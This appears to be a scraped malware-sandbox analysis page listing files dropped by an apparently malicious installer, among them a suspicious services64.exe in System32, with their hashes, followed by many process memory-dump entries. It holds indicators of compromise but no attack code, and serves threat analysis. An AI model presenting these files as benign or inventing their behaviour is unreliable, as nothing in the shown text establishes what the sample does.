550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsgAF1E.tmp\INetC.dll
Filesize
21KB

MD5
2b342079303895c50af8040a91f30f71

SHA1
b11335e1cb8356d9c337cb89fe81d669a69de17e

SHA256
2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f

SHA512
550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsgAF1E.tmp\INetC.dll
Filesize
21KB

MD5
2b342079303895c50af8040a91f30f71

SHA1
b11335e1cb8356d9c337cb89fe81d669a69de17e

SHA256
2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f

SHA512
550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsgAF1E.tmp\INetC.dll
Filesize
21KB

MD5
2b342079303895c50af8040a91f30f71

SHA1
b11335e1cb8356d9c337cb89fe81d669a69de17e

SHA256
2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f

SHA512
550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsgAF1E.tmp\NsisCrypt.dll
Filesize
15KB

MD5
a3e9024e53c55893b1e4f62a2bd93ca8

SHA1
aa289e93d68bd15bfcdec3bb00cf1ef930074a1e

SHA256
7183cf34924885dbadb7f3af7f1b788f23b337144ab69cd0d89a5134a74263ad

SHA512
a124cf63e9db33de10fda6ba0c78cbb366d9cc7ef26f90031dba03c111dfdcd4a9bd378e1075211fd12e63da2beffa973f8c3f5b283be5debb06e820aa02750b

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsgAF1E.tmp\System.dll
Filesize
11KB

MD5
fbe295e5a1acfbd0a6271898f885fe6a

SHA1
d6d205922e61635472efb13c2bb92c9ac6cb96da

SHA256
a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1

SHA512
2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe
Filesize
429KB

MD5
b7bb39edc90d4b1130b4af547687073c

SHA1
6a04f421fe87f23995f2f352b562b26fcc05499e

SHA256
838979fac0dec9e9be3c5aa603668560a6864cef242af9498e3d3b452eabd85e

SHA512
606c04663ce01aaa368350c273d98eb7193b1df7c0254bde53aa9fa80b070a2b31c63131735dcbd8d46547a6ba5adbddbe762317e64e2938f3ddf747c14b7ad4

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe
Filesize
429KB

MD5
b7bb39edc90d4b1130b4af547687073c

SHA1
6a04f421fe87f23995f2f352b562b26fcc05499e

SHA256
838979fac0dec9e9be3c5aa603668560a6864cef242af9498e3d3b452eabd85e

SHA512
606c04663ce01aaa368350c273d98eb7193b1df7c0254bde53aa9fa80b070a2b31c63131735dcbd8d46547a6ba5adbddbe762317e64e2938f3ddf747c14b7ad4

Download Submit
C:\Users\Admin\AppData\Local\Temp\sqlite.dll
Filesize
4KB

MD5
0bf04cd55f22085c736c762e3cf58498

SHA1
72fa7983c5aaf6b72fba1435155e73315f175b38

SHA256
229776d2f3ba3eb872e43884b6ae4df4dbc3812b89a015c9d1fc84bc1f3e2989

SHA512
8ff95fa97c802ee9c611d85a7bd777109398a5183af23b4f667c0f4f310e2972212529b1a75302fa35600bf822bcb9f18329d48612a1f0e597abe9c369c54088

Download Submit
C:\Users\Admin\AppData\Roaming\MyNotes\MyNotes.exe
Filesize
11.8MB

MD5
dba0368e323c82b99a7af0c8df85b588

SHA1
6bbbd9c70f944ea563aa7e4bbc88b78181f4564c

SHA256
b76eeae3b84a7d2cc9fb672fb219c074c0268eb68ed2301321ac6c18379deccd

SHA512
19b31ff4c883ca2b30ffa2a570dcc43b84ebcaf9a33a430283e56eaf001d04f1ce5f23006befa1c6d093944b9b01dab866482fe88d05ef86c0541189945eca58

Download Submit
C:\Users\Admin\AppData\Roaming\MyNotes\nw.dll
Filesize
141.9MB

MD5
1f05c1781050415f90f28bc960f69a7b

SHA1
3f148269bd26e5b598cbfe4aa50139e67747b282

SHA256
39b11a34a235038b943b043de6dd8ca1d16182f934cff74cd7b2967ae8c7bb19

SHA512
64169f010c9e42c4dba068d5f2da762537cb2094483a55c6de2a304d0dbbff5462ff40afd889571227b8844256999dfb4277d4029b2292d22347641b27ff78dd

Download Submit
C:\Users\Admin\AppData\Roaming\MyNotes\nw_elf.dll
Filesize
910KB

MD5
493a0d17daaa2f1a0c2e5723ed748e05

SHA1
316f77ac6e8aea60e76ebd4bbbe4ff5c65a59ae4

SHA256
a0f65b98cf5425335345c736fd026d5cf8984283e402dc746092c1edd7f4ebd7

SHA512
7c87e1cf803dbe785f58be5f633c19e00d0c61f3a7759e5da3a90cc5e97165d833866872c50a0a52e42b80056a98e1020d02cd6c8f81efe4e76452f20a139f84

Download Submit
C:\Users\Admin\AppData\Roaming\MyNotes\nw_elf.dll
Filesize
910KB

MD5
493a0d17daaa2f1a0c2e5723ed748e05

SHA1
316f77ac6e8aea60e76ebd4bbbe4ff5c65a59ae4

SHA256
a0f65b98cf5425335345c736fd026d5cf8984283e402dc746092c1edd7f4ebd7

SHA512
7c87e1cf803dbe785f58be5f633c19e00d0c61f3a7759e5da3a90cc5e97165d833866872c50a0a52e42b80056a98e1020d02cd6c8f81efe4e76452f20a139f84

Download Submit
C:\Windows\System32\services64.exe
Filesize
2.1MB

MD5
ecbec95fc0b0ca6aee51f5ed6dec2cf0

SHA1
6e1bea66d99a7be247b08cc5af3cb8ec72df62c5

SHA256
ce3a9a9c457dd43c535cabe7cfaffc4ccd5485a02a52a2b13ad0822b6622789b

SHA512
a3256489d95ca5c2ea37aaef84a72346a20c8bcec37558ae920d2c96951af56d0ade2298a84b55a924770e37e54bb0826e67452d4c171697a3b2955c9b835a81

Download Submit
C:\Windows\System32\services64.exe
Filesize
2.1MB

MD5
ecbec95fc0b0ca6aee51f5ed6dec2cf0

SHA1
6e1bea66d99a7be247b08cc5af3cb8ec72df62c5

SHA256
ce3a9a9c457dd43c535cabe7cfaffc4ccd5485a02a52a2b13ad0822b6622789b

SHA512
a3256489d95ca5c2ea37aaef84a72346a20c8bcec37558ae920d2c96951af56d0ade2298a84b55a924770e37e54bb0826e67452d4c171697a3b2955c9b835a81

Download Submit
C:\Windows\system32\services64.exe
Filesize
2.1MB

MD5
ecbec95fc0b0ca6aee51f5ed6dec2cf0

SHA1
6e1bea66d99a7be247b08cc5af3cb8ec72df62c5

SHA256
ce3a9a9c457dd43c535cabe7cfaffc4ccd5485a02a52a2b13ad0822b6622789b

SHA512
a3256489d95ca5c2ea37aaef84a72346a20c8bcec37558ae920d2c96951af56d0ade2298a84b55a924770e37e54bb0826e67452d4c171697a3b2955c9b835a81

Download Submit
C:\Windows\system32\services64.exe
Filesize
2.1MB

MD5
ecbec95fc0b0ca6aee51f5ed6dec2cf0

SHA1
6e1bea66d99a7be247b08cc5af3cb8ec72df62c5

SHA256
ce3a9a9c457dd43c535cabe7cfaffc4ccd5485a02a52a2b13ad0822b6622789b

SHA512
a3256489d95ca5c2ea37aaef84a72346a20c8bcec37558ae920d2c96951af56d0ade2298a84b55a924770e37e54bb0826e67452d4c171697a3b2955c9b835a81

Download Submit
memory/176-317-0x0000000000000000-mapping.dmp

Download
memory/224-302-0x00007FF859910000-0x00007FF85A3D1000-memory.dmp

Filesize
10.8MB

Download
memory/224-301-0x0000000000000000-mapping.dmp

Download
memory/432-197-0x00007FF85CF50000-0x00007FF85DA11000-memory.dmp

Filesize
10.8MB

Download
memory/432-173-0x0000000000130000-0x0000000000138000-memory.dmp

Filesize
32KB

Download
memory/432-169-0x0000000000000000-mapping.dmp

Download
memory/432-221-0x00007FF85CF50000-0x00007FF85DA11000-memory.dmp

Filesize
10.8MB

Download
memory/980-271-0x0000000000000000-mapping.dmp

Download
memory/1076-249-0x0000000000000000-mapping.dmp

Download
memory/1228-172-0x0000000000DA0000-0x0000000000DA8000-memory.dmp

Filesize
32KB

Download
memory/1228-228-0x00007FF85CF50000-0x00007FF85DA11000-memory.dmp

Filesize
10.8MB

Download
memory/1228-234-0x00007FF85CF50000-0x00007FF85DA11000-memory.dmp

Filesize
10.8MB

Download
memory/1228-166-0x0000000000000000-mapping.dmp

Download
memory/1228-195-0x00007FF85CF50000-0x00007FF85DA11000-memory.dmp

Filesize
10.8MB

Download
memory/1320-216-0x0000000000000000-mapping.dmp

Download
memory/1372-294-0x0000000000000000-mapping.dmp

Download
memory/1400-250-0x00007FF85D070000-0x00007FF85DB31000-memory.dmp

Filesize
10.8MB

Download
memory/1400-276-0x00007FF85D070000-0x00007FF85DB31000-memory.dmp

Filesize
10.8MB

Download
memory/1428-150-0x0000000007D60000-0x0000000007DF2000-memory.dmp

Filesize
584KB

Download
memory/1428-149-0x0000000008270000-0x0000000008814000-memory.dmp

Filesize
5.6MB

Download
memory/1428-134-0x0000000000FB0000-0x0000000000FE4000-memory.dmp

Filesize
208KB

Download
memory/1428-131-0x0000000000000000-mapping.dmp

Download
memory/1592-214-0x0000000000000000-mapping.dmp

Download
memory/1648-272-0x0000000000000000-mapping.dmp

Download
memory/1800-248-0x0000000000000000-mapping.dmp

Download
memory/1896-259-0x00007FF85D070000-0x00007FF85DB31000-memory.dmp

Filesize
10.8MB

Download
memory/1896-251-0x0000000000000000-mapping.dmp

Download
memory/1896-254-0x00007FF85D070000-0x00007FF85DB31000-memory.dmp

Filesize
10.8MB

Download
memory/2080-222-0x0000000000000000-mapping.dmp

Download
memory/2184-299-0x0000000000000000-mapping.dmp

Download
memory/2420-247-0x0000000000000000-mapping.dmp

Download
memory/2440-277-0x0000000000000000-mapping.dmp

Download
memory/2524-288-0x0000000000000000-mapping.dmp

Download
memory/2528-329-0x0000000000000000-mapping.dmp

Download
memory/2808-322-0x0000000000000000-mapping.dmp

Download
memory/2812-297-0x0000000000000000-mapping.dmp

Download
memory/2812-252-0x0000000000000000-mapping.dmp

Download
memory/3000-229-0x00007FF85CF50000-0x00007FF85DA11000-memory.dmp

Filesize
10.8MB

Download
memory/3000-232-0x00007FF85CF50000-0x00007FF85DA11000-memory.dmp

Filesize
10.8MB

Download
memory/3000-198-0x00007FF85CF50000-0x00007FF85DA11000-memory.dmp

Filesize
10.8MB

Download
memory/3000-174-0x0000000000000000-mapping.dmp

Download
memory/3000-177-0x0000000000B90000-0x0000000000B98000-memory.dmp

Filesize
32KB

Download
memory/3112-162-0x00000000001C0000-0x00000000001F9000-memory.dmp

Filesize
228KB

Download
memory/3112-212-0x00000000053A0000-0x00000000059B8000-memory.dmp

Filesize
6.1MB

Download
memory/3112-161-0x0000000000983000-0x00000000009AF000-memory.dmp

Filesize
176KB

Download
memory/3112-213-0x00000000059F0000-0x0000000005A02000-memory.dmp

Filesize
72KB

Download
memory/3112-215-0x0000000005A10000-0x0000000005B1A000-memory.dmp

Filesize
1.0MB

Download
memory/3112-140-0x0000000000000000-mapping.dmp

Download
memory/3112-163-0x0000000000400000-0x000000000079D000-memory.dmp

Filesize
3.6MB

Download
memory/3112-226-0x0000000000983000-0x00000000009AF000-memory.dmp

Filesize
176KB

Download
memory/3112-224-0x0000000005B40000-0x0000000005B7C000-memory.dmp

Filesize
240KB

Download
memory/3240-321-0x0000000000000000-mapping.dmp

Download
memory/3288-307-0x0000000000000000-mapping.dmp

Download
memory/3348-296-0x00007FF859910000-0x00007FF85A3D1000-memory.dmp

Filesize
10.8MB

Download
memory/3348-311-0x00007FF859910000-0x00007FF85A3D1000-memory.dmp

Filesize
10.8MB

Download
memory/3384-239-0x00007FF85D070000-0x00007FF85DB31000-memory.dmp

Filesize
10.8MB

Download
memory/3384-270-0x00007FF85D070000-0x00007FF85DB31000-memory.dmp

Filesize
10.8MB

Download
memory/3384-264-0x00007FF85D070000-0x00007FF85DB31000-memory.dmp

Filesize
10.8MB

Download
memory/3384-240-0x0000014B6FF70000-0x0000014B6FF82000-memory.dmp

Filesize
72KB

Download
memory/3384-238-0x0000014B6E090000-0x0000014B6E2B1000-memory.dmp

Filesize
2.1MB

Download
memory/3392-292-0x0000000000000000-mapping.dmp

Download
memory/3472-138-0x0000000000000000-mapping.dmp

Download
memory/3508-186-0x0000000000000000-mapping.dmp

Download
memory/3508-202-0x00007FF85CF50000-0x00007FF85DA11000-memory.dmp

Filesize
10.8MB

Download
memory/3508-231-0x00007FF85CF50000-0x00007FF85DA11000-memory.dmp

Filesize
10.8MB

Download
memory/3508-233-0x00007FF85CF50000-0x00007FF85DA11000-memory.dmp

Filesize
10.8MB

Download
memory/3508-189-0x00000000006A0000-0x00000000006A8000-memory.dmp

Filesize
32KB

Download
memory/3528-230-0x0000000000400000-0x00000000007EE000-memory.dmp

Filesize
3.9MB

Download
memory/3528-143-0x0000000000000000-mapping.dmp

Download
memory/3528-164-0x00000000009D3000-0x0000000000A4F000-memory.dmp

Filesize
496KB

Download
memory/3528-165-0x0000000000AC0000-0x0000000000B96000-memory.dmp

Filesize
856KB

Download
memory/3528-227-0x0000000000AC0000-0x0000000000B96000-memory.dmp

Filesize
856KB

Download
memory/3528-201-0x0000000000400000-0x00000000007EE000-memory.dmp

Filesize
3.9MB

Download
memory/3604-243-0x0000000000000000-mapping.dmp

Download
memory/3712-199-0x00007FF85CF50000-0x00007FF85DA11000-memory.dmp

Filesize
10.8MB

Download
memory/3712-223-0x00007FF85CF50000-0x00007FF85DA11000-memory.dmp

Filesize
10.8MB

Download
memory/3712-181-0x0000000000FD0000-0x0000000000FD8000-memory.dmp

Filesize
32KB

Download
memory/3712-178-0x0000000000000000-mapping.dmp

Download
memory/3720-291-0x0000000000000000-mapping.dmp

Download
memory/3788-135-0x0000000000000000-mapping.dmp

Download
memory/3944-280-0x0000000000000000-mapping.dmp

Download
memory/4044-253-0x0000000000000000-mapping.dmp

Download
memory/4056-308-0x000000014030F3F8-mapping.dmp

Download
memory/4056-310-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/4056-313-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/4056-146-0x0000000000000000-mapping.dmp

Download
memory/4056-154-0x00000000005A0000-0x00000000005B0000-memory.dmp

Filesize
64KB

Download
memory/4056-158-0x00000000005D0000-0x00000000005E2000-memory.dmp

Filesize
72KB

Download
memory/4080-130-0x0000000000820000-0x0000000000BC8000-memory.dmp

Filesize
3.7MB

Download
memory/4100-155-0x0000000000000000-mapping.dmp

Download
memory/4104-295-0x0000000000000000-mapping.dmp

Download
memory/4104-298-0x00007FF859910000-0x00007FF85A3D1000-memory.dmp

Filesize
10.8MB

Download
memory/4132-204-0x0000000000400000-0x0000000000798000-memory.dmp

Filesize
3.6MB

Download
memory/4132-151-0x0000000000000000-mapping.dmp

Download
memory/4132-208-0x0000000000AF7000-0x0000000000B1E000-memory.dmp

Filesize
156KB

Download
memory/4132-203-0x0000000000870000-0x00000000008B3000-memory.dmp

Filesize
268KB

Download
memory/4136-209-0x0000000000000000-mapping.dmp

Download
memory/4156-269-0x0000000000000000-mapping.dmp

Download
memory/4228-267-0x00007FF85D070000-0x00007FF85DB31000-memory.dmp

Filesize
10.8MB

Download
memory/4228-263-0x00007FF85D070000-0x00007FF85DB31000-memory.dmp

Filesize
10.8MB

Download
memory/4228-260-0x0000000000000000-mapping.dmp

Download
memory/4272-303-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/4272-312-0x0000000000DC0000-0x0000000000DE0000-memory.dmp

Filesize
128KB

Download
memory/4272-309-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/4272-306-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/4272-304-0x000000014030F3F8-mapping.dmp

Download
memory/4348-293-0x0000000000000000-mapping.dmp

Download
memory/4372-289-0x0000000000000000-mapping.dmp

Download
memory/4428-290-0x0000000000000000-mapping.dmp

Download
memory/4664-200-0x00007FF85CF50000-0x00007FF85DA11000-memory.dmp

Filesize
10.8MB

Download
memory/4664-185-0x00000000004F0000-0x00000000004F8000-memory.dmp

Filesize
32KB

Download
memory/4664-217-0x00007FF85CF50000-0x00007FF85DA11000-memory.dmp

Filesize
10.8MB

Download
memory/4664-182-0x0000000000000000-mapping.dmp

Download
memory/4844-159-0x0000000000000000-mapping.dmp

Download
memory/4888-235-0x0000000000000000-mapping.dmp

Download
memory/5036-258-0x0000000000000000-mapping.dmp

Download
memory/5036-262-0x00007FF85D070000-0x00007FF85DB31000-memory.dmp

Filesize
10.8MB

Download
memory/5036-265-0x00007FF85D070000-0x00007FF85DB31000-memory.dmp

Filesize
10.8MB

Download
memory/5088-300-0x00007FF859910000-0x00007FF85A3D1000-memory.dmp

Filesize
10.8MB

Download
memory/5092-255-0x00007FF85D070000-0x00007FF85DB31000-memory.dmp

Filesize
10.8MB

Download
memory/5092-245-0x00007FF85D070000-0x00007FF85DB31000-memory.dmp

Filesize
10.8MB

Download
memory/5092-244-0x0000000000000000-mapping.dmp

Download
memory/5092-246-0x0000021CDF300000-0x0000021CDF322000-memory.dmp

Filesize
136KB

Download